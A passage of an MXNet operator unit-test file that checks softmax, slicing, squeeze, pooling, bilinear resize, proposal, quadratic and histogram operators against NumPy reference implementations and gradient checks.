        for dtype, rtol, atol in zip(dtype_l, rtol_l, atol_l):
            compare_forw_backw_binary_op(
                name, mx_op, np_fw, np_bw1, np_bw2, shape, lo1, hi1, lo2,
                hi2, rtol, atol, dtype)
        # Finite differences only in float64.
        finite_diff_binary_op(
            name, mx_op, shape, lo1, hi1, lo2, hi2, rtol_fd, atol_fd,
            num_eps)
@with_seed()
def test_softmax():
    """Smoke-test softmax forward/backward over a few shapes and modes."""
    ctx = default_context()
    # (shape, preserve_shape) pairs mirror the original call sequence.
    for shp, preserve in [((3, 4), False), ((3, 4), True), ((3, 4, 2), True)]:
        check_softmax_with_shape(shp, ctx, preserve_shape=preserve)
    check_softmax_grad(ctx)
    check_smoothed_softmax_grad(ctx)
@with_seed()
def test_softmax_output_normalization():
    """Verify SoftmaxOutput gradients for every normalization mode.

    Exercises multi_output on/off, use_ignore on/off and normalization
    in {'null', 'batch', 'valid'}, comparing autograd gradients against
    a reference computed from the softmax probabilities.
    """
    def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
        grad_scale = np.random.random()
        batch_size = 8
        num_labels = 6
        H, W = 3, 3
        # Only ignore a (random) label when requested; -1 never matches.
        ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
        # multi_output uses a per-pixel NCHW layout, otherwise plain (N, C).
        if multi_output:
            data_shape = (batch_size, num_labels, H, W)
            label_shape = (batch_size, H, W)
        else:
            data_shape = (batch_size, num_labels)
            label_shape = (batch_size, )
        data = mx.nd.random.uniform(-1, 1, shape=data_shape)
        label = mx.nd.random.randint(
            0, num_labels, shape=label_shape).astype('float32')
        data.attach_grad()
        kwargs = dict(grad_scale=grad_scale,
                      normalization=normalization, multi_output=multi_output)
        if use_ignore:
            kwargs.update(use_ignore=True, ignore_label=ignore_label)
        # Forward + backward through the operator under test.
        with mx.autograd.record():
            out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
            out.backward(mx.nd.ones_like(data))
        # Reference softmax over the class axis (axis 1).
        exp_data = mx.nd.exp(data)
        softmax_data = exp_data / exp_data.sum(1, keepdims=True)
        # NOTE(review): argmax_data is computed but never used.
        argmax_data = mx.nd.argmax(data, axis=1)
        # Forward output must be the plain softmax probabilities.
        assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
        one_hot_label = mx.nd.one_hot(label, num_labels)
        if multi_output:
            # one_hot appends the class axis last; move it to axis 1 (NCHW).
            one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
        # Reference gradient: softmax - one_hot, masked by ignore_label.
        data_grad = softmax_data - one_hot_label
        if use_ignore:
            if multi_output:
                data_grad *= (label !=
                              ignore_label).reshape((batch_size, 1, H, W))
            else:
                data_grad *= (label != ignore_label).reshape((batch_size, 1))
        # Normalization divisor: 1 ('null'), batch size, or #valid labels.
        valid_cnt = 1
        if normalization == 'batch':
            valid_cnt = batch_size
        elif normalization == 'valid':
            valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
        scale = grad_scale / valid_cnt
        if multi_output:
            # Per-pixel outputs are additionally divided by H*W except in
            # 'valid' mode, where valid_cnt already counts pixels.
            if normalization != 'valid':
                scale /= H * W
        data_grad *= scale
        assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
    # Run the reference check over the full configuration grid.
    for multi_output in [False, True]:
        for use_ignore in [False, True]:
            for normalization in ['null', 'batch', 'valid']:
                _softmaxoutput_normalization(
                    multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
    """Forward/backward checks for mx.nd.slice / mx.sym.slice.

    Compares against NumPy basic slicing for a variety of index tuples
    (including strided and negative steps), verifies that zero-size
    slices raise MXNetError, and runs a numeric-gradient check.
    """
    def test_slice_forward_backward(a, index):
        a_np = a.asnumpy()
        begin = []
        end = []
        step = []
        # Decompose the Python slice objects into the begin/end/step
        # lists expected by the mxnet slice API.
        for slice_i in index:
            begin.append(slice_i.start)
            end.append(slice_i.stop)
            step.append(slice_i.step)
        b = mx.nd.slice(a, begin=begin, end=end, step=step)
        b_np = a_np[index]
        assert same(b.asnumpy(), b_np)
        data = mx.sym.Variable('data')
        slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
        # Slice gradient scatters the head gradient back into the sliced
        # positions; every other input position stays zero.
        expected_in_grad = np.zeros_like(a_np)
        expected_in_grad[index] = b_np
        check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
    shape = (16, 14, 17, 20)
    arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
    # Mix of full, partial, strided and negative-step index tuples.
    index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
                  (slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
                  (slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
                  (slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
                  (slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
    for index in index_list:
        test_slice_forward_backward(arr, index)
    # A slice whose begin equals end would produce a zero-size output,
    # which the operator rejects (see the assertRaises calls below).
    def test_begin_equals_end(shape, begin, end, step):
        in_arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
        out_arr = mx.nd.slice(in_arr, begin=begin, end=end, step=step)
    assertRaises(MXNetError, test_begin_equals_end, (4,), (2,), (2,), (1,))
    assertRaises(MXNetError, test_begin_equals_end, (1, 5), (None, 3), (None, 3), (-1, 1))
    assertRaises(MXNetError, test_begin_equals_end, (3, 4, 5), (1, 3, 1), (3, 3, 1), (1, -3, 2))
    assertRaises(MXNetError, test_begin_equals_end, (2, 4), (None, 2), (None, 2), (1, -1))
    # check numeric gradient
    in_data = np.arange(36).reshape(2, 2, 3, 3)
    data = mx.sym.Variable('data')
    slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
    check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
    """Partial shape inference for slice/slice_axis with an unknown dim.

    An unknown dimension is encoded as 0 under legacy shape semantics
    and as -1 under ``mx.np_shape``; slicing a known dimension must
    still infer the resulting extent while unknown dims stay unknown.
    """
    def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
        out = mx.sym.slice(data, begin=begin, end=end, step=step)
        assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
    def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
        out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
        assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
    # Legacy shape semantics: 0 marks the unknown first dimension.
    var1 = mx.sym.var(name="data", shape=(0, 20))
    check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
    check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
    check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
    check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
    check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
    check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
    check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
    var1 = mx.sym.var(name="data", shape=(10, 0))
    check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
    check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
    # Same checks under NumPy shape semantics, where -1 means unknown.
    with mx.np_shape():
        var1 = mx.sym.var(name="data", shape=(-1, 20))
        check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
        check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
        check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
        check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
        check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
        check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
        check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
        var1 = mx.sym.var(name='data', shape=(10, -1))
        check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
        check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
    """Regression test: https://github.com/apache/incubator-mxnet/issues/9007

    The float16 extremes must survive a round-trip through an ndarray
    and be returned exactly by mx.nd.min / mx.nd.max.
    """
    fp16 = np.finfo('float16')
    arr = mx.nd.array([fp16.min, fp16.max], dtype='float16')
    assert arr.dtype == np.float16
    assert mx.nd.min(arr).asscalar() == fp16.min
    assert mx.nd.max(arr).asscalar() == fp16.max
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
    """min/max over an array with a zero-size dimension must raise MXNetError."""
    # Fix: the inner callables were previously named ``min`` and ``max``,
    # shadowing the builtins (lint A001); renamed for clarity. Behavior
    # is unchanged.
    def reduce_min():
        a = mx.nd.zeros(shape=(5, 0))
        a.min()

    def reduce_max():
        a = mx.nd.zeros(shape=(5, 0))
        a.max()

    assert_raises(MXNetError, reduce_min)
    assert_raises(MXNetError, reduce_max)
@with_seed()
def test_squeeze_op():
    """Compare mx.nd.squeeze against np.squeeze and check gradients."""
    def verify_squeeze(shape, axis=None):
        data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
        if axis is None:
            actual = mx.nd.squeeze(data).asnumpy()
            expected = np.squeeze(data.asnumpy())
        else:
            actual = mx.nd.squeeze(data, axis=axis).asnumpy()
            expected = np.squeeze(data.asnumpy(), axis=axis)
        # Exception: mxnet squeezes an all-ones shape to (1,) rather than
        # a 0-d array, so rebuild the expectation keeping the first axis.
        if actual.shape == (1,):
            expected = np.squeeze(
                data.asnumpy(), axis=tuple(range(1, len(shape))))
        assert same(actual, expected)

    # Forward checks over various axis selections.
    base_shape = (1, 5, 1, 3, 1)
    for ax in (0, 2, 4, (0, 4), (0, 2, 4), None):
        verify_squeeze(base_shape, ax)
    verify_squeeze((1, 1, 1, 1))
    # Gradient checks via finite differences.
    data = mx.symbol.Variable('data')
    shape = (1, 2, 1, 3, 1)
    data_tmp = np.ones(shape)
    for sym in (mx.sym.squeeze(data),
                mx.sym.squeeze(data, axis=2),
                mx.sym.squeeze(data, axis=(2, 4))):
        check_numeric_gradient(sym, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
    """Compare contrib.AdaptiveAvgPooling2D with a pure-Python reference."""
    def py_adaptive_avg_pool(x, height, width):
        # 2D per frame adaptive avg pool
        def adaptive_avg_pool_frame(x, y):
            isizeH, isizeW = x.shape
            osizeH, osizeW = y.shape
            for oh in range(osizeH):
                # Input row window [istartH, iendH) covering output row oh.
                istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
                iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
                kH = iendH - istartH
                for ow in range(osizeW):
                    # Input column window [istartW, iendW) for column ow.
                    istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
                    iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
                    kW = iendW - istartW
                    xsum = 0
                    for ih in range(kH):
                        for iw in range(kW):
                            xsum += x[istartH+ih][istartW+iw]
                    # Average over the (possibly uneven) pooling window.
                    y[oh][ow] = xsum / kH / kW
        B,C,_,_ = x.shape
        y = np.empty([B,C,height, width], dtype=x.dtype)
        for b in range(B):
            for c in range(C):
                adaptive_avg_pool_frame(x[b][c], y[b][c])
        return y
    def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
        x = mx.nd.random.uniform(shape=shape)
        # A scalar output_size means a square (H == W) output.
        if output_width is None:
            y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
            npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
        else:
            y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
            npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
        assert_almost_equal(y.asnumpy(), npy)
    # All square and rectangular output sizes from 1x1 up to 10x10.
    shape = (2, 2, 10, 10)
    for i in range(1, 11):
        check_adaptive_avg_pool_op(shape, i)
        for j in range(1, 11):
            check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
    """Check contrib.BilinearResize2D against a pure-Python reference,
    covering explicit sizes, every size-selection mode and backward."""
    def py_bilinear_resize(x, outputHeight, outputWidth):
        # Reference forward pass: bilinear interpolation over NCHW input.
        batch, channel, inputHeight, inputWidth = x.shape
        if outputHeight == inputHeight and outputWidth == inputWidth:
            return x
        y = np.empty([batch, channel, outputHeight, outputWidth])
        # Grid ratios between input and output (0 for size-1 outputs).
        rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
        rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
        for h2 in range(outputHeight):
            h1r = 1.0 * h2 * rheight
            h1 = int(np.floor(h1r))
            h1lambda = h1r - h1
            # h1p selects the next row unless we're at the bottom edge.
            h1p = 1 if h1 < (inputHeight - 1) else 0
            for w2 in range(outputWidth):
                w1r = 1.0 * w2 * rwidth
                w1 = int(np.floor(w1r))
                w1lambda = w1r - w1
                w1p = 1 if w1 < (inputWidth - 1) else 0
                for b in range(batch):
                    for c in range(channel):
                        # Weighted sum of the 4 neighbouring input pixels.
                        y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
                            w1lambda*x[b][c][h1][w1+w1p]) + \
                            h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
                            w1lambda*x[b][c][h1+h1p][w1+w1p])
        return y
    def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
        # Reference backward pass: scatter each incoming gradient onto the
        # 4 input pixels it was interpolated from, with the same weights.
        data1 = np.zeros_like(x)
        data2 = incoming_grads
        batchsize = data1.shape[0]
        channels = data1.shape[1]
        height1 = data1.shape[2]
        width1 = data1.shape[3]
        height2 = data2.shape[2]
        width2 = data2.shape[3]
        rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
        rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
        # special case: just copy
        if height1 == height2 and width1 == width2:
            data1 += data2
            return [data1]
        for h2 in range(0, height2):
            for w2 in range(0, width2):
                # Vertical source position and interpolation weights.
                h1r = rheight * h2
                h1 = int(h1r)
                h1p = 1 if (h1 < height1 - 1) else 0
                h1lambda = h1r - h1
                h0lambda = 1 - h1lambda
                #
                # Horizontal source position and interpolation weights.
                w1r = rwidth * w2
                w1 = int(w1r)
                w1p = 1 if (w1 < width1 - 1) else 0
                w1lambda = w1r - w1
                w0lambda = 1 - w1lambda
                #
                for n in range(0, batchsize):
                    for c in range(0, channels):
                        d2val = data2[n][c][h2][w2]
                        data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
                        data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
                        data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
                        data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
        # In 'like' mode the second (size-reference) input gets zero grad.
        if mode == 'like':
            return data1, np.zeros_like(incoming_grads)
        return [data1]
    def check_bilinear_resize_op(shape, height, width):
        # Forward check for explicit height/width and for the equivalent
        # scale_height/scale_width specification.
        x = mx.nd.random.uniform(shape=shape)
        y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
        assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
        x_scale = width / shape[-1]
        y_scale = height / shape[-2]
        y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
        assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
    def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
        # Each mode branch computes the output height/width the operator
        # is expected to produce, then results are compared to the
        # Python reference at that size.
        x = mx.nd.random.uniform(shape=shape)
        original_h = shape[2]
        original_w = shape[3]
        if mode == 'odd_scale':
            assert scale_height is not None and scale_width is not None
            new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
                int((original_h - 1) * scale_height) + 1
            new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
                else int((original_w - 1) * scale_width) + 1
            y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
                                               scale_width=scale_width,
                                               mode='odd_scale')
        elif mode == 'to_even_down':
            new_h = original_h if (original_h % 2) == 0 else original_h - 1
            new_w = original_w if (original_w % 2) == 0 else original_w - 1
            y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
        elif mode == 'to_even_up':
            new_h = original_h if (original_h % 2) == 0 else original_h + 1
            new_w = original_w if (original_w % 2) == 0 else original_w + 1
            y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
        elif mode == 'to_odd_down':
            new_h = original_h if (original_h % 2) == 1 else original_h - 1
            new_w = original_w if (original_w % 2) == 1 else original_w - 1
            y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
        elif mode == 'to_odd_up':
            new_h = original_h if (original_h % 2) == 1 else original_h + 1
            new_w = original_w if (original_w % 2) == 1 else original_w + 1
            y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
        elif mode == 'like':
            # 'like' takes the target H/W from a second input array.
            x_1 = mx.nd.random.uniform(shape=shape_1)
            new_h = x_1.shape[2]
            new_w = x_1.shape[3]
            y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
        new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
        new_shape_got = np.array(y.shape, dtype='int')
        data_sym = mx.sym.var('data')
        data_np = x.asnumpy()
        expected = py_bilinear_resize(data_np, new_h, new_w)
        out_grads = np.ones([shape[0], shape[1], new_h, new_w])
        expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
        assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
            str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
        assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
        # Symbolic forward/backward plus a finite-difference check.
        if mode != 'like':
            resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
            check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
        else:
            data_sym_like = mx.sym.var('data_like')
            resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            date_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
    # Explicit target sizes (down-, same- and up-sampling).
    shape = (2, 2, 10, 10)
    check_bilinear_resize_op(shape, 5, 5)
    check_bilinear_resize_op(shape, 10, 10)
    check_bilinear_resize_op(shape, 15, 15)
    check_bilinear_resize_op(shape, 3, 7)
    check_bilinear_resize_op(shape, 13, 17)
    # Mode-based sizes on an even-sized input...
    shape = (2, 2, 20, 20)
    check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, mode='to_even_down')
    check_bilinear_resize_modes_op(shape, mode='to_even_up')
    check_bilinear_resize_modes_op(shape, mode='to_odd_down')
    check_bilinear_resize_modes_op(shape, mode='to_odd_up')
    # ...and on an odd-sized input.
    shape = (2, 2, 21, 21)
    check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
    check_bilinear_resize_modes_op(shape, mode='to_even_down')
    check_bilinear_resize_modes_op(shape, mode='to_even_up')
    check_bilinear_resize_modes_op(shape, mode='to_odd_down')
    check_bilinear_resize_modes_op(shape, mode='to_odd_up')
    # 'like' mode in both directions (shrink and grow).
    shape_0 = (2, 2, 21, 21)
    shape_1 = (2, 2, 10, 10)
    check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
    check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
def test_multi_proposal_op():
    """contrib.MultiProposal must match per-image contrib.Proposal
    results batch-wise, and its backward must produce zero gradients."""
    # parameters
    feature_stride = 16
    scales = (8, 16, 32)
    ratios = (0.5, 1, 2)
    rpn_pre_nms_top_n = 12000
    rpn_post_nms_top_n = 2000
    threshold = 0.7
    rpn_min_size = 16
    batch_size = 20
    feat_len = (1000 + 15) // 16
    H, W = feat_len, feat_len
    num_anchors = len(scales) * len(ratios)
    # NOTE(review): count_anchors is computed but never used.
    count_anchors = H * W * num_anchors
    '''
    cls_prob: (batch_size, 2 * num_anchors, H, W)
    bbox_pred: (batch_size, 4 * num_anchors, H, W)
    im_info: (batch_size, 3)
    '''
    cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
    bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
    im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
    cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
    bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
    # Random per-image (height, width, scale) triplets.
    for i in range(batch_size):
        im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
        im_scale = np.random.randint(70, 100) / 100.0
        im_info[i, :] = [im_size[0], im_size[1], im_scale]
    def get_sub(arr, i):
        # Slice out image i while keeping a leading batch axis of 1.
        new_shape = list(arr.shape)
        new_shape[0] = 1
        res = arr[i].reshape(new_shape)
        return res
    def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
        # Run single-image Proposal for each batch element ...
        single_proposal = []
        single_score = []
        for i in range(batch_size):
            rois, score = mx.nd.contrib.Proposal(
                cls_prob = get_sub(cls_prob, i),
                bbox_pred = get_sub(bbox_pred, i),
                im_info = get_sub(im_info, i),
                feature_stride = feature_stride,
                scales = scales,
                ratios = ratios,
                rpn_pre_nms_top_n = rpn_pre_nms_top_n,
                rpn_post_nms_top_n = rpn_post_nms_top_n,
                threshold = threshold,
                rpn_min_size = rpn_min_size, output_score = True)
            single_proposal.append(rois)
            single_score.append(score)
        # ... and the whole batch through MultiProposal at once.
        multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
            cls_prob = cls_prob,
            bbox_pred = bbox_pred,
            im_info = im_info,
            feature_stride = feature_stride,
            scales = scales,
            ratios = ratios,
            rpn_pre_nms_top_n = rpn_pre_nms_top_n,
            rpn_post_nms_top_n = rpn_post_nms_top_n,
            threshold = threshold,
            rpn_min_size = rpn_min_size, output_score = True)
        single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
        single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
        single_proposal_np = single_proposal.asnumpy()
        multi_proposal_np = multi_proposal.asnumpy()
        single_score_np = single_score.asnumpy()
        multi_score_np = multi_score.asnumpy()
        # check rois x1,y1,x2,y2
        assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
        # check rois batch_idx
        for i in range(batch_size):
            start = i * rpn_post_nms_top_n
            end = start + rpn_post_nms_top_n
            assert (multi_proposal_np[start:end, 0] == i).all()
        # check score
        assert np.allclose(single_score_np, multi_score_np)
    def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
        # Backward is expected to yield all-zero gradients for every
        # input (see `expected` below).
        im_info_sym = mx.sym.Variable('im_info')
        cls_prob_sym = mx.sym.Variable('cls_prob')
        bbox_pred_sym = mx.sym.Variable('bbox_pred')
        sym = mx.sym.contrib.MultiProposal(
            cls_prob = cls_prob_sym,
            bbox_pred = bbox_pred_sym,
            im_info = im_info_sym,
            feature_stride = feature_stride,
            scales = scales,
            ratios = ratios,
            rpn_pre_nms_top_n = rpn_pre_nms_top_n,
            rpn_post_nms_top_n = rpn_post_nms_top_n,
            threshold = threshold,
            rpn_min_size = rpn_min_size, output_score = False)
        location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
        expected = [np.zeros_like(e) for e in location]
        out_grads = [np.ones((rpn_post_nms_top_n, 5))]
        check_symbolic_backward(sym, location, out_grads, expected)
    check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
    check_forward(rpn_pre_nms_top_n, 1500)
    check_forward(1000, 500)
    check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
    """Check contrib.quadratic (a*x^2 + b*x + c) forward and backward."""
    def quad(x, a, b, c):
        return a * x**2 + b * x + c

    a = np.random.random_sample()
    b = np.random.random_sample()
    c = np.random.random_sample()
    data = mx.symbol.Variable('data')
    quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
    for dtype in [np.float16, np.float32, np.float64]:
        # float16 gets looser tolerances.
        tol = 1e-2 if dtype is np.float16 else 1e-5
        for ndim in range(1, 6):
            shape = rand_shape_nd(ndim, 5)
            data_np = np.random.randn(*shape).astype(dtype)
            expected = quad(data_np, a, b, c)
            # d/dx (a*x^2 + b*x + c) = 2*a*x + b
            backward_expected = 2 * a * data_np + b
            # Imperative forward.
            output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
            assert_almost_equal(output.asnumpy(), expected, rtol=tol, atol=tol)
            # Symbolic forward.
            check_symbolic_forward(quad_sym, [data_np], [expected],
                                   rtol=tol, atol=tol)
            # Symbolic backward against the analytic gradient.
            check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
                                    [backward_expected], rtol=tol, atol=tol)
            # Finite-difference check.
            check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
    """Compare mx.nd.histogram / mx.sym.histogram with np.histogram for
    both count-plus-range and explicit-bin-edge inputs."""
    def f(x, bins=10, range=None):
        return np.histogram(x, bins, range=range)
    for ndim in range(1, 6):
        shape = rand_shape_nd(ndim)
        x = rand_ndarray(shape, stype='default', dtype=np.float64)
        # Fixed, monotonically increasing bin edges.
        mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
        np_bins = mx_bins.asnumpy()
        bin_cnt = random.randint(2, 10)
        bin_range = (-2.5, 2.5)
        # Case 1: bin count + explicit range.
        mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
        np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
        assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
        assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
        # Case 2: explicit bin-edge array.
        mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
        np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
        assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
        assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
        # The symbolic API must agree with the NumPy results as well.
        data = mx.sym.Variable("data")
        bins = mx.sym.Variable("bins")
        histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
        histo2 = mx.sym.histogram(a=data, bins=bins)
        executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
        executor1.forward(is_train=False)
        assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
        executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
        executor2.forward(is_train=False)
        assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
    """Monitor callback (monitor_all=False) must report each operator's
    output blob names in the expected order."""
    def check_name(op_sym, expected_names):
        output_names = []

        def get_output_names_callback(name, arr):
            output_names.append(py_str(name))

        op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
        op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
        try:
            op_exe.forward()
            mx.nd.waitall()
        except mx.base.MXNetError:
            # skip errors since test is to check output names
            pass
        for output_name, expected_name in zip(output_names, expected_names):
            assert output_name == expected_name

    is_windows = sys.platform.startswith('win')
    # Disable subgraph in case subgraph will replace symbol.  Windows
    # doesn't support setting environment variables on the fly, so the
    # environment is left untouched there.
    if not is_windows:
        os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
    data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
    conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
    check_name(conv_sym, ['conv_output'])
    deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
    check_name(deconv_sym, ['deconv_output'])
    fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
    check_name(fc_sym, ['fc_output'])
    lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
    check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
